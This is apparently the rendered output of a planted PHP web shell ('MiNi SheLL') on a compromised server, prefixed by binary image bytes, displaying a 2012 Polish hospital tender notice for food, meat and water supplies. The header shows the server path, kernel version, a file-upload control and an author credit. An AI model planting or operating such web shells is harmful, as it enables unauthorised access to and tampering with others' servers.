JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120221/41731-N-2012.html

<p class="kh_header"><b>Olsztyn: dostawa żywności (wędlin, artykułów spożywczych, wody)</b><br>
<b>Numer ogłoszenia: 41731 - 2012; data zamieszczenia: 21.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa żywności (wędlin, artykułów spożywczych, wody).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa żywności: 1) wędlin, 2) artykułów spożywczych, 3) wody - zgodnie ze  szczegółowym opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ.
Zamówienie będzie udzielane w 3 częściach, zgodnie z poniższym wyszczególnieniem:
Cz. 1) wędliny, 
Cz. 2) artykuły spożywcze, 
Cz. 3) woda.

Zamówienie będzie realizowane na zasadach i warunkach określonych w:
SIWZ, w tym załącznikach do SIWZ, a w szczególności projekcie umowy, ofercie wybranego Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli ze złożonych dokumentów będzie wynikało, że wykonawca może prowadzić działalność w zakresie objętym przedmiotem zamówienia: w tym celu Wykonawca musi przedstawić decyzję PPIS lub PIW zezwalającą na działalność w zakresie produkcji i obrotu żywnością, zatwierdzającą zakres prowadzonej działalności. Natomiast jeżeli nie będzie posiadał takiego uprawnienia - nie spełni warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie   oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zgodnie z art. 25 ust. 1 pkt. 2 Ustawy Prawo zamówień publicznych oraz w oparciu o § 5.1.1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr  226, poz. 1817) zamawiający informuje, iż w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, zamawiający żąda dostarczenia następujących oświadczeń i dokumentów: 

(a)	dla części I. Wędliny
1) świadectwo nadzoru weterynaryjnego zakładu - w przypadku producenta, nadzoru PPIS w przypadku hurtowni, z której pochodzi surowiec spożywczy;
2) oświadczenie o wdrożeniu zasad GMP/GHP oraz systemu HACCP, Systemu Zarządzania Bezpieczeństwem Żywności zgodnym z ISO 22000: 2005 lub IFS, BRC, FSSC; jeżeli zakład posiada certyfikowany system  - kopię certyfikatu. Zamawiający dopuszcza możliwość złożenia zaświadczenia PIS lub PIW potwierdzającego spełnianie wymagań prawa żywnościowego (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) 
3) dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, które wykonawca przeznacza do realizacji zamówienia.

(b)	dla części II. Artykuły spożywcze
1) świadectwo nadzoru PPIS. 
2) oświadczenie o wdrożeniu zasad GMP/GHP oraz systemu HACCP, Systemu Zarządzania Bezpieczeństwem Żywności zgodnym z ISO 22000: 2005 lub IFS, BRC, FSSC; jeżeli zakład posiada certyfikowany system  - kopię certyfikatu. Zamawiający dopuszcza możliwość złożenia zaświadczenia PIS potwierdzającego spełnianie wymagań prawa żywnościowego (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
3) dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, które wykonawca przeznacza do realizacji zamówienia.

(c)	dla części III. Woda
1) świadectwo nadzoru PPIS. 
2) oświadczenie o wdrożeniu zasad GMP/GHP oraz systemu HACCP, Systemu Zarządzania Bezpieczeństwem Żywności zgodnym z ISO 22000: 2005 lub IFS, BRC, FSSC; jeżeli zakład posiada certyfikowany system  - kopię certyfikatu. Zamawiający dopuszcza możliwość złożenia zaświadczenia PIS potwierdzającego spełnianie wymagań prawa żywnościowego (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
3) dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, które wykonawca przeznacza do realizacji zamówienia.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, pok. 27, adres e-mail: zamowienia@szpital.olsztyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2012 godzina 10:00, miejsce: Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 (wędliny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WĘDLINY
Lp.	Nazwa asortymentu	j. m	ilość	Nazwa producenta lub źródło pochodzenia
				
	I.Kiełbasy nietrwałe drobno rozdrobnione			
1.	Parówki drobiowe ok. 70 g	kg	1600	
2.	Mortadela bez dodatków	kg	800	
3.	Mortadela z dodatkami (papryka, pieczarki )	kg	200	
4.	Mielonka 	kg	100	
5.	Lunchmeat	kg	100	
	II.Kiełbasy nietrwałe średnio lub grubo rozdrobnione			
6.	Szynkowa wieprzowa	kg	800	
7.	Szynkowa drobiowa	kg	100	
8.	Pierś z indyka wędzona	kg	30	
9.	Szynka konserwowa 	kg	300	
10.	Zwyczajna	kg	130	
	III.Kiełbasy trwałe i półtrwałe			
11.	jałowcowa	kg	10	
	IV.Wędzonki			
12.	Szynka	kg	600	
13.	Polędwica sopocka	kg	20	
	V.produkty blokowe			
14.	pieczenie	kg	100	
	VI.wędliny podrobowe			
15.	Salceson mozaikowy	kg	120	
16.	Pasztet drobiowy	kg	160	
17.	Kaszanka jęczmienna vac, masa pętka ok. 100 - 110 g	kg	50	
18.	pasztetowa	kg	30	
	VII. jadalne surowce rzeżne - półprodukt			
19.	Flaki wołowe podgotowane vac	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 (artykuły ogólnospozywcze).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	NAZWA   ARTYKUŁU	J.m.	Ilość	Wielkość opakowania	Producent, nazwa hadlowa				
1	Budyń bez cukru opakowanie  1 kg, bez smaków: czekoladowy, karmelowy	kg	10						
2	maca typu Kupiec lub Sante opak. 160 - 180 g 	szt.	300						
3	Biszkopty   typu  Tago, Delicpol,opak. 350g	szt.	450						
4	Chrzan konserwowy typu Frubex, Frutico opak.180ml = 170g	szt.	80						
5	Ciastka - herbatniki typu Jutrzenka  Petitki, Szkolne opak. 100g	szt.	600						
6	Cukier opakowanie 50kg, 1kg	kg	3 000						
7	Cukier waniliowy  typu Rolwit, Emix opak. 32g	szt.	500						
8	Cynamon mielony typu Rolwit, Galeo opak. 20g	szt.	100						
9	Chrzan konserwowy z żurawiną typu Frubex, Frutico, Provitus opak.180ml = 170g	szt.	20						
10	Drożdże krajowe świeże 100g	szt.	100						
11	Dżem owocowy niskosłodzony: typu Sorella, różne smaki, opak. 280g	szt.	2 400						
12	Miód sztuczny, typu Lubawa, Vortumnus , opak. 370g	szt.	10						
13	Groszek konserwowy typu Vernet ok.400g, po odcieku 240 g	szt.	130						
14	Herbata granulowana indyjska, Typu Aster, Saga,opak. 100g	szt	800						
15	paluszki Grissini, typu Planetaopak 70g	szt	400						
16	Kasza gryczana cała, opak. 1kg	kg	100						
17	Kasza jęczmienna średnia, Mazurska opak.   1kg	kg	600						
18	Kasza manna, opak. 1kg	kg	1 000						
19	susz warzywny, typu Sys, opak 0,20 kg 	kg	5						
20	Kisiel bez cukru, różne smaki, typu Emix, Kandex, opak.  1 kg, 	kg	650						
21	Kleik ryżowy typu Nestle, opak. 180g 	szt.	250						
22	Koncentrat pomidorowy opak. 1 000g typu Kotlin, Włocławek, Sadki, Pudliszki	szt	280						
23	Kukurydza konserwowa w puszce opak. 340g po odcieku 280 g	szt.	850						
24	Kwasek cytrynowy typu opak. 1 kg	kg	70						
25	Liść laurowy typu opak. 1 kg 	kg	5						
26	Majeranek typu opak 1 kg	kg	7						
27	Majonez kętrzyński opak. 280 g	szt.	700						
28	pomidory konserwowe całe  bskórki, typu opak 400g, po odcieku 240g	szt.	230						
29	Makaron drobny, np. gwiazdki, ryż typu opak. 0,5 kg	szt	200						
30	Makaron gruby: świderki, kolanka, muszelki, nitka gruba cięta, łazanki typu opakowanie 1 kg	kg	800						
31	Olej uniwersalny rzepakowy opak 3 l 	szt	450						
32	mąka żytnia typ.2000, typu opak. 0,90 - 1 kgkg	kg	160						
33	ziele angielskie całe, typu opak. min 0,5 kg	kg	5						
34	kasza jęczmiennna pęczak, opak. 1 kg	kg	50						
35	Mąka pszenna luksusowa  typ 550, opak. 1kg	kg	2 100						
36	Mąka ziemniaczana, opak. 0,5 kg	szt	30						
37	kasza jaglana, opak.  0,5 kg	szt	250						
38	kasza kukurydziana gruba, opak. 0,4 kg	szt	700						
39	kawa zbożowa  opak. 1 kg	kg	500						
40	ryż parboiled topak 5kg	szt	230						
41	kakao, opak. 100g	szt	100						
42	Musztarda sarepska, opak 180g	szt	50						
43	Ocet 10% , opak 0,5l	szt	200						
44	Ogórki konserwowe opak.słoik  900 ml	szt	150						
45	Olej uniwersalny rzepakowy opak 1 l 	szt	60						
46	Papryka konserwowa opak. słoik 900ml	szt	220						
47	Pieprz czarny naturalny mielony typu opak. 1 kg	kg	20						
48	Pieprz ziołowy luksusowy opak. 1 kg	kg	8						
49	Papryka czerwona mielona słodka, opak. 1 kg	kg	4						
50	Papryka czerwona mielona ostra, opak. 1 kg	kg	4						
51	Płatki owsiane zwykłe opak 0,5kg	szt	260						
52	Płatki kukurydziane, opak 2 kg	szt	130						
53	Przyprawa do zup w płynie opak.1 l	szt	260						
54	galaretka owocowa, opak 1 kg	kg	110						
55	podgrzybek suszony, opak. 1 kg	kg	5						
56	mleko w proszku pełne, szybkorozpuszczalne, opak. 1 kg	kg	70						
57	Sól jodowana kamienna,  opak 1 kg	kg	1 400						
58	fasola wiejska, opak 5 kg	szt	8						
59	Rodzynki 200 g	szt	6						
60	rosół jarzynowy, opak. 1 kg	kg	100						
61	Żelatyna spożywcza wieprzowa  opak 1 kg	kg	30						
62	Groch łuskany, opak 5 kg	szt	10						
63	goździki, opak ok. 10g	szt	20						
64	Koncentrat pomidorowy opak. 0,20 kg 	szt	250						
65	Szczaw konserwowy krojony opak. 900g,  	szt	120						
66	Tymianek typu opak ok. 10g	szt	20						
67	Zaprawa owocowa do napojów opak 420 ml	szt	50						
68	przecier ogórkowy opak. 900g,  	szt	180						
69	bazylia, opak ok. 10 - 30g	szt	100						
70	kminek w ziarnie, opak ok. 10 - 30g	szt	100						
71	zioła prowansalskie, opak ok. 10 - 30g	szt	50						
72	płatki jęczmienne błyskawiczne, opak 1 kg	kg	250						
73	pieczywo bezglutenowe: ryżowe, kukurydziane, opak 100g	szt	100						
74	wafle ryżowe, naturalne,  opak 100g	szt	500						
75	Herbatki owocowe, różne smaki, pakowane po 20 saszetek	szt.	100						
76	Herbata 1,2,3,  opak po 20 saszetek	szt.	100						
77	słodzik w tabletkach, opak ok. 100g	szt	10						
78	soja, opak 1 kg	kg	5						
79	soczewica zielona, opak 1 kg	kg	10						
80	śliwka suszona kalifornijska, opak 0,5 lub 1 kg	kg	5						
81	morela suszona, opak 0,5 lub 1 kg	kg	4						
82	otręby, opak ok. 0,5 kg	szt	4						
83	otręby granulowane ze śliwkami opak. 150g	szt	5						
84	musli z owocami, opak 0,35 - 0,40 g	szt	10						
85	pieczywo chrupkie WASA, opak od 210g do 245 g, graham, 3 zboża, z sezamem, żytnie, 	szt	350						
86	oliwki zielone, czarne bez pestek, opakowanie: słoiczki 140g, po odcieku 70g	szt	50						
87	kotlety sojowe, opak 100g	szt	30						
88	orzechy włoskie łuskane, opak  min 300g	kg	3						
89	orzechy laskowe łuskane, opak min.  300g	kg	3						
90	imbir mielony, opak ok. 10 - 30g	szt	10						
91	przyprawa curry, opak ok. 10 - 30g	szt	50						
92	tuńczyk w sosie własnym, duże kawałki, opak. 170g - 180g	szt	120						
93	oregano, opak ok. 10 - 30g	szt	50						
94	zioła do sałatek, opak. ok. 10g	szt	170						
95	herbata czerwona z cytryną Pu-erh, w saszetkach	szt	200						
96	herbata zielona liściasta, opak 100g	szt	40						
97	oliwa z oliwek Extra Vergine,  opak. 0,5 - 0,75 l	szt	50						
98	ananas plastry opak 565 g, po odcieku 340g, szt	110						
99	żurawina, borówka do mięs, opak. 280 - 300g, 	szt	40						
100	Sok pomarańczowy bez cukru, opak szklane odkręcane 0,25 l - 0,33 l	szt	1 200						
101	Sok pomidorowy opak szklane odkręcane 0,25 l - 0,33 l	szt	230						
102	Sok jabłkowy bez cukru opak szklane odkręcane 0,25 l - 0,33 l	szt	2 000						
103	Soki  bez cukru, różne, opak. 0,5 l, 	szt	100						
104	Soki wielowarzywne, opak 1 l, 	szt	100						
105	sok jabłko antonówka 100 % bez dodatku cukru opak. 1 l	szt	50						
106	sok pomarańczowy 100 % bez dodatku cukru, naturalnie mętny, , opak. 1 l	szt	120						
107	sok z czerwonych grapefruitów 100 %, bez dodatku cukru, naturalnie mętny, opak 1l	szt	60						
108	Sok z czarnych porzeczek i winogron 100 % bez dodatku cukru, naturalnie mętny, opak. 1 l	szt	50						
109	sok z białych grapefruitów 100 %, bez dodatku cukru, naturalnie mętny,  opak 1l	szt	60						
110	soczewica czerwona, opak 350 g	kg	5						
111	woda mineralna gazowana opak.  Pet 0,5 l szt	400						
112	woda mineralna niegazowana opak.  Pet 0,5 l 	szt	400						
113	ciastka Delicje pomarańczowe,  morelowe, malinowe, jagodowe, wiśniowe, opak 147g, szt	50						
114	wafle  orzechowe, opak 160 - 200g, 	szt	50						
115	Cukierki czekoladowe Mieszanka, opak. 220 - 300 g, 	szt	40						
116	zabielacz do kawy w proszku Carmen, opak. 200 g	szt	30						
117	proszek do pieczenia, opak 20 - 40 g	szt	30						
118	kawa rozpuszczalna Jacobs Velvet, opak. 200 g	szt	20						
119	kawa rozpuszczalna Nescafe, opak. 200 g	szt	20						
120	cząber,typu  opak. ok. 10g - 20g	szt	20						
121	śmietanka do kawy typu Zott, opak: kubeczki 10 szt x 10	szt	70						
122	pasztet sojowy opak 113 g	szt	100						
123	fasola czerwona, opak ok. 300 g	szt	20						
124	ryż brązowy, opak 1 kg	kg	50						
125	makaron pełnoziarnisty razowy, opak 0,5 kg	kg	50						
126	mąka żytnia biała, opak 1,0 kg	kg	50						
127	ocet balsamiczny, opak 250 ml	szt	10						
128	sos sojowy, opak 900g	szt	10						
129	pestki słonecznika łuskane, opak. 1 kg	kg	10						
130	pestki dyni łuskane, opak. 200g	szt	30						
131	siemie lniane, opak. 200g	szt	30						
132	woda mineralna gazowana, opak.pet  1,5 l	szt	400						
133	woda mineralna niegazowana opak.  Pet, 1,5 l	szt	800						
134	herbata ekpresowa , torebki 2 g, opak. 200 szt	szt	12						
135	herbata , różne smaki owocowe, opak. 20 torebek piramidek	szt	20						
136	herbata owocowo - ziołowa , różne smaki,opak. 20 torebek piramidek	szt	20						
137	miód naturalny wielokwiatowy, opak. twist 1300g	szt	10						
138	fasola czerwona w puszce,  ok. 400g g	szt	100						
139	przyprawa do szaszłyków, opak HORECA ok.1300g	op	4						
140	musztarda francuska opak 180 - 200g	szt	30						
141	rozmaryn, opak. 10 - 20g	szt	20						
142	krem chrzanowy, opak. 180 - 200g	szt	60						
143	żurawina suszona cała opak 200 - 300 g	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 (woda).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NATURALNA WODA ŻRÓDLANA DO URZĄDZEŃ DOZUJĄCYCH
Naturalna woda źródlana w butlach o pojemności 18,9 - 19,00 l              1450 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com